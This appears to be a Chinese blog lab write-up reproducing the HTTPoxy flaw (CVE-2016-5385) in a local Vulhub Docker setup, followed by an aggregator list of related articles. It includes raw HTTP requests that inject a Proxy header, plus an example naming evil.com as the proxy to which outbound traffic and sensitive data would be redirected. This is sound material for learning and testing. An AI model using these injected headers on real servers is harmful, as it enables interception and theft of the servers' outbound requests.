利用Vulnhub复现漏洞 - HTTPoxy漏洞(CVE-2016-5385)

2023-10-27

Vulnhub官方复现教程

https://vulhub.org/#/environments/cgi/httpoxy/

漏洞原理

参考:http://www.laruence.com/2016/07/19/3101.html

简单来说,根据RFC 3875规定,cgi(fastcgi)要将用户传入的所有HTTP头都加上HTTP_前缀放入环境变量中,而恰好大多数类库约定俗成会提取环境变量中的HTTP_PROXY值作为HTTP代理地址。于是,恶意用户通过提交Proxy: http://evil.com这样的HTTP头,将使用缺陷类库的网站的代理设置为http://evil.com,进而窃取数据包中可能存在的敏感信息。

PHP5.6.24版本修复了该漏洞,不会再将Proxy放入环境变量中。本环境使用PHP 5.6.23为例。

当然,该漏洞不止影响PHP,所有以CGI或Fastcgi运行的程序理论上都受到影响。

复现过程

启动环境

https://blog.csdn.net/JiangBuLiu/article/details/93853056
进入路径为

cd /root/vulhub/cgi/httpoxy

搭建及运行漏洞环境:

docker-compose build && docker-compose up -d

用时:30分钟

漏洞复现

端口设置

浏览器设置

以火狐浏览器FireFox为例,在选项常规网络设置设置,将连接手动代理配置HTTP代理,填写127.0.0.1,端口为8080
在这里插入图片描述

BurpSuit设置

ProxyOptionsProxy Listeners编辑监听端口为8080
在这里插入图片描述
并将ProxyIntercept点击成Intercept is on

发出请求

正常请求http://your-ip/index.php,可见其Origin为当前请求的服务器,二者IP相等:
在这里插入图片描述

GET /index.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

找到一个可以正常运行的http代理,比如http://www.89ip.cn/,选取可用的IP+端口。
附带Proxy: http://x.x.x.x:yyyy/头,再次访问http://your-ip/index.php

GET /index.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Proxy: http://x.x.x.x:yyyy/
Upgrade-Insecure-Requests: 1

在这里插入图片描述
如上图,可见此时的Origin已经变成x.x.122.65,也就是说真正进行HTTP访问的服务器是x.x.122.65,也就是说x.x.x.x:yyy已经将正常的HTTP请求代理了。

x.x.x.x:yyy上使用NC,就可以捕获当前请求的数据包,其中可能包含敏感数据:

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

利用Vulnhub复现漏洞 - HTTPoxy漏洞(CVE-2016-5385) 的相关文章

  • vulnhub靶场之THALES: 1

    x1f680 优质资源分享 x1f680 学习路线指引 xff08 点击解锁 xff09 知识定位人群定位 x1f9e1 Python实战微信订餐小程序 x1f9e1 进阶级本课程是python flask 43 微信小程序的完美结合 xf
  • 【vulnhub靶场之DC2靶机渗透】

    目录 一 前言 二 渗透过程 一 前言 大家好 xff0c 又到了快乐的学习时光了 xff0c 最近也是沉迷于DC系列的靶场 xff0c 每一次成功拿下靶场后都会学习和总结到很多的东西 今天的受害者是DC 2靶场 xff0c 话不多说 xf
  • 教你怎么用Vulnhub来搭建环境

    0x01 前言 Vulnhub它是一个提供各种漏洞环境的平台 里面大部分的环境是要用VMware或者VirtualBox打开运行的 如果只是练习一些常见的漏洞可以看我另外两篇用Docker来搭建各种漏洞靶场 妈妈再也不用担心我没有靶场练习了
  • Hashcat的使用手册总结

    简介 Hashcat是自称世界上最快的密码恢复工具 它在2015年之前拥有专有代码库 但现在作为免费软件发布 适用于Linux OS X和Windows的版本可以使用基于CPU或基于GPU的变体 支持hashcat的散列算法有Microso
  • vulnhub靶场Matrix-Breakout 2 Morpheus教程

    靶场搭建 靶机下载地址 Matrix Breakout 2 Morpheus VulnHub 直接解压双击ova文件即可 使用软件 VMware 可能会出现问题 VirtualBox 此处官方建议使用VirtualBox 难度 中等 攻击机
  • 利用Vulnhub复现漏洞 - JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)

    JBoss 4 x JBossMQ JMS 反序列化漏洞 CVE 2017 7504 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 漏洞复现 发送POC 通过命令 通过 BurpSuit 发送 检测POC是否成功 Vulnhub
  • 跨站请求伪造CSRF(Cross-site request forgery)

    目录 一 什么是CSRF 二 可能存在CSRF攻击的三个条件 一个相关的动作 基于 Cookie 的会话处理 没有不可预测的请求参数 二 常见的CSRF攻击 1 CSRF令牌的验证取决与请求方法 2 CSRF令牌的验证取决与令牌是否存在 3
  • app渗透-外在信息收集

    app渗透 外在信息收集 5 外在信息收集 5 1外在抓包 frida r0capture 5 1 1 frida的安装和使用 1 安装 2 使用测试 5 2 1 r0capture使用 5 外在信息收集 5 1外在抓包 frida r0c
  • 漏洞复现之CVE-2015-1635-HTTP.SYS远程执行代码漏洞(ms15-034)

    1 1 1 漏洞描述 在2015年4月安全补丁日 微软发布的众多安全更新中 修复了HTTP sys中一处允许远程执行代码漏洞 编号为 CVE 2015 1635 MS15 034 利用HTTP sys的安全漏洞 攻击者只需要发送恶意的htt
  • win7下metasploit-framework安装及使用笔记

    1 去官网下载最新版本的metasploit framework 2 下载好后 退出电脑的杀毒软件 因为安装的时候里面好多文件会被当做病毒删除 3 点击安装 下一步下一步依次即可 4 安装完成后启动 这个启动的地方我找了好久 具体启动的地方
  • kali使用aircrack无线攻击wifi超详细步骤(包含监听网卡启动,获得握手包,密码本生成)

    平台及工具 linux kali平台 aircrack ng 工具 免驱监听网卡 详细操作 1 首先启动kali 插入网卡 输入ifconfig查看kali是否检测到监听网卡 注意监听网卡要免驱动的 ifconfig 查看自身网卡信息 如图
  • NTLM及Kerberos认证原理摘录

    目录 NTLM 前言 认证流程 本地认证 NTLM Hash的生成 Kerberos认证 概念 认证流程 编辑Kerberos协议四个角色介绍 KDC的介绍 Kerberos认证 大体分为三个流程 Authentication Servic
  • VulnHub DC-8

    确定靶机IP地址 扫描靶机的开放端口 发现靶机开放端口有80 22 访问80端口 扫描网站的目录 发现敏感目录user 访问user目录 发现是登陆界面 使用工具查看网站的CMS 发现网站的nid会变化试一试会不会有sql注入漏洞 加个单引
  • Kioptrix_Level_1-writeup

    Kioptrix Level 1 writeup 0x00 信息收集 目标机器IP 16 16 16 176 kali攻击机 16 16 16 177 nmap扫描端口服务 nmap A Pn 16 16 16 176 Starting N
  • Jangow

    Jangow 1 环境准备 靶场地址 https www vulnhub com entry jangow 101 754 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境 启动即可 将网段设置为NAT模式
  • ATT&CK - T1546.003

    事件触发的执行 WMI事件订阅 目的 出现场景 ATT CK T1546 003 https attack mitre org techniques T1546 003 检查方式 复现方式 目的 建立持久性 出现场景 比如一些病毒的启动方式
  • Deathnote

    Deathnote 1 主机发现 arp scan l 2 扫描端口 nmap Pn sV P A 192 168 80 132 开放了80 22端口 3 访问80端口 修改host文件访问80端口时进行了跳转到deathnote vuln
  • SQL SERVER的注入要点

    SQL SERVER的注入要点 一 SQLServer数据库的查询语句 函数查询 1 select version 查询数据库的版本 2 select host name 查询主机名 如果是用navicat远程连接的话 主机名是本地的名字
  • 利用Vulnhub复现漏洞 - OpenSSH 用户名枚举漏洞(CVE-2018-15473)

    OpenSSH 用户名枚举漏洞 CVE 2018 15473 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 漏洞复现 CVE 2018 15473 Exploit Vulnhub官方复现教程 https vulhub org e
  • vulnhub之vegeta

    目录 一 主机发现 二 端口扫描 四 信息收集 五 cyberchef解密 1 两道base64解密 2 save保存 3 qrcode module 4 二维码提取工具zbaring 六 大字典跑目录 七 bulma 八 音频分析软件au

随机推荐

  • 记一次 MyBatis常用到的动态sql

    一 SQL的动态拼接标签 if标签 where标签 choose when otherwise标签 set标签 trim标签 bind标签 sql和include标签 foreach标签 二 if标签 test中写判断条件 参数直接para
  • Windows系统在虚拟机上安装Linux系统操作步骤

    1 下载VM虚拟机 VM官网 VMware Workstation Player VMware Customer Connect 2 下载CentOS 7系统 下载好虚拟机以后 我们就可以下载阿里云的CentOS7镜像了 网址 centos
  • C++传递不定参函数

    定义不定参数函数 要用到下面这些宏 va start ap farg 初始化一个va list变量ap farg是第一个形参 va arg ap type 获取 下 一个type类型的参数 va end ap 结束使用ap C语言里编写不定
  • textarea显示全部内容支持高度自适应

    function readyNumber textarea each function this setAttribute style height this scrollHeight px overflow y hidden on inp
  • 江山如此多娇(图与文)—旅美散记之五

    自费自助的旅美行程匆匆 在几个城镇探亲访友之后 就近看了一些景点 浮光掠影 广实浅新 且把照片当节目 加以调侃作串联报幕词 与博友们共享 月光下的尼亚加拉大瀑布 阳光下的尼亚加拉大瀑布照片比较常见 这次碰巧看到了瀑布上的彩虹 见下图 这就是
  • 高斯噪声(gauss noise)

    概述 高斯噪声是指它的概率密度函数服从高斯分布 即正态分布 的一类噪声 与椒盐噪声相似 Salt And Pepper Noise 高斯噪声 gauss noise 也是数字图像的一个常见噪声 椒盐噪声是出现在随机位置 噪点深度基本固定的噪
  • 【python】Appium安卓padUI自动化

    Appium安卓padUI自动化踩的坑 总结如下 一 从native页面跳转到webview页面 获取链接并定位元素 方法一 通过Charles抓包 可以定位到pad跳转到的H5页面 获取页面地址 在pc端进行元素定位 方法二 在web c
  • 【牛客SQL】SQL16 统计出当前各个title类型对应的员工当前薪水对应的平均工资

    题目描述 描述 有一个员工职称表titles简况如下 有一个薪水表salaries简况如下 请你统计出各个title类型对应的员工薪水对应的平均工资avg 结果给出title以及平均工资avg 并且以avg升序排序 以上例子输出如下 示例1
  • Windows环境下配置Ceres(含Eigen、gflags、glog、merit、suitesparse)

    1 配置环境与源代码包 环境 Windows 8 1企业版 Visual Studio 2013 专业版X64 Cmake GUI 3 13 0 rc1 Ceres solver 1 14 0 下载地址 http ceres solver
  • @keyframes的应用

    目录 一 keyframes 二 hover和 keyframes 一 keyframes 1 keyframes能够创建动画 创建动画的原理是将一套 CSS 样式逐渐变化为另一套样式 2 animation属性控制动画的外观 animat
  • js块级作用域--理解

    在JavaScript中没有块级作用域的概念 这意味着在块级语句中定义的变量 实际上是包含在函数中的 而不是在语句中创建的 下面来看一个例子 function testdemo for var i 0 i lt 10 i alert i t
  • python爬取音乐并保存_python3 实现爬取TOP500的音乐信息并存储到mongoDB数据库中

    爬取TOP500的音乐信息 包括排名情况 歌曲名 歌曲时间 网页版酷狗不能手动翻页进行下一步的浏览 仔细观察第一页的URL 这里尝试将1改为2 再进行浏览 恰好是第二页的信息 再改为3 恰好是第三页的信息 多次尝试发现不同的数字即为不同的页
  • Transformer(李宏毅老师Transforme PPT截图)

    参考李宏毅老师Transformer 课程连接https www youtube com watch v ugWDIIOHtPA list PLJV el3uVTsOK ZK5L0Iv EQoL1JefRL4 index 61 Seq2se
  • java实现二维码识别(ZBar)

    要求 系统Centos7 x 第一步安装Cmake yum install y gcc gcc c wget wget https cmake org files v3 14 cmake 3 14 0 tar gz tar zxvf cma
  • IDEA生成jar工具包

    使用IDEA生成jar工具包 使用IDEA生成jar工具包 通过导入的方式在其它项目中使用 注意 此jar包是非执行jar包 只能作为工具包来使用 打包流程 1 点击 Build gt Build Module jar01 完成之后会生成
  • VS调试时无响应,卡顿,卡死的解决方案

    1 修改体调试设置 调试 gt 选项 gt 调试 gt 符号 去掉xxx服务器 勾选仅加载指定的模块 2 修改搜狗输入法 3 由于VS运行太久缓存太多 1 单击 开始 选择 运行 或者win r快捷键 2 键入 devenv exe res
  • mac下通过命令行查找文件

    直接在命令行中输入 mdfind name xxxx png 如果不知道完整的文件名称的话 只需要输入你记得的几个词就行
  • 智能家居(调用libcurl编程访问百度主页)

    一 代码 include
  • Redis未授权漏洞复现

    一 简介 Redis Remote Dictionary Server 即远程字典服务 是一个开源的使用ANSI C语言编写 支持网络 可基于内存亦可持久化的日志型 Key Value数据库 并提供多种语言的API 漏洞介绍 Redis因配
  • 利用Vulnhub复现漏洞 - HTTPoxy漏洞(CVE-2016-5385)

    HTTPoxy漏洞 CVE 2016 5385 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 漏洞复现 端口设置 浏览器设置 BurpSuit设置 发出请求 Vulnhub官方复现教程 https vulhub org envi